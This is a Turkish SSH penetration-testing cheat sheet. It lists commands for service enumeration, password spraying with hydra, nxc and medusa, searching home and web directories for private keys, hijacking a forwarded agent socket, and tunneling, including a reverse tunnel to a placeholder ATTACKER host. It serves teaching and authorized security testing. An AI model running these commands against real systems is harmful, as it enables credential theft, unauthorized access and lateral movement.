Skip to content

SSH Pentesting

SSH difficulty: kolay-orta

SSH çoğu ortamda yönetim düzlemidir: zayıf parola, yeniden kullanılan anahtar, eski algoritma ve agent forwarding yanlışları shell’e giden kısa yoldur.

- Hedef IP / hostname, opsiyonel kullanıcı listesi
- Araçlar: nmap, ssh-audit, hydra/nxc, ssh-keygen, ssh
  1. Banner / sürüm ve desteklenen auth yöntemlerini çıkar.

  2. Zayıf cipher/KEX/hostkey ve user enum ipuçlarını not et.

  3. Anahtar veya parola ile erişim dene (spray politikasına uy).

  4. İçeride agent, config, authorized_keys ve lateral tünelleri kontrol et.

Terminal window
nmap -p22 -sV --script ssh2-enum-algos,ssh-auth-methods,ssh-hostkey 10.10.10.5
Terminal window
ssh-audit 10.10.10.5
Terminal window
ssh -v -o PreferredAuthentications=none -o NumberOfPasswordPrompts=0 user@10.10.10.5
Terminal window
nc -nv 10.10.10.5 22
Terminal window
nmap -p22 --script ssh-auth-methods --script-args="ssh.user=root" 10.10.10.5
Terminal window
hydra -L users.txt -P pass.txt ssh://10.10.10.5 -t 4
Terminal window
nxc ssh 10.10.10.5 -u users.txt -p 'Sonbahar2025!' --continue-on-success
Terminal window
medusa -h 10.10.10.5 -U users.txt -P pass.txt -M ssh
Terminal window
# bilinen private key ile
ssh -i id_rsa user@10.10.10.5
Terminal window
chmod 600 id_rsa
Terminal window
ssh-keygen -y -f id_rsa

Parola sprey disiplinleri: Password Attacks.

Terminal window
find /home /root -name id_rsa -o -name id_ed25519 -o -name authorized_keys 2>/dev/null
Terminal window
cat ~/.ssh/config
Terminal window
cat ~/.ssh/known_hosts
Terminal window
grep -R "BEGIN OPENSSH PRIVATE KEY" /var/www /opt 2>/dev/null

ForwardAgent yes ile bağlanmış oturumda kurbanın agent soketine erişilebilir:

Terminal window
echo "$SSH_AUTH_SOCK"
Terminal window
ssh-add -l
Terminal window
ssh -A user@10.10.10.5
Terminal window
# ele geçirilen sock üzerinden başka hosta
SSH_AUTH_SOCK=/tmp/ssh-XXX/agent.YYY ssh user@internal
Terminal window
ssh -L 8080:127.0.0.1:80 user@10.10.10.5
Terminal window
ssh -R 9050:127.0.0.1:9050 user@ATTACKER
Terminal window
ssh -D 1080 user@10.10.10.5
Terminal window
ssh -J jumpuser@bastion user@internal

Daha geniş tünel repertuvarı: Pivoting.

ssh-audit

embedded tool
Generated command
ssh-audit 10.10.10.5
- Eski OpenSSH / libssh CVE’leri (sürüme göre)
- root login + PasswordAuthentication yes
- Aynı anahtarın birçok sunucuda yeniden kullanımı
- debian weak keys / düşük entropy (eski cihazlar)
ssh-audit → zayıf auth
→ spray veya bulunan id_rsa
→ SSH -D / -J → iç ağ nmap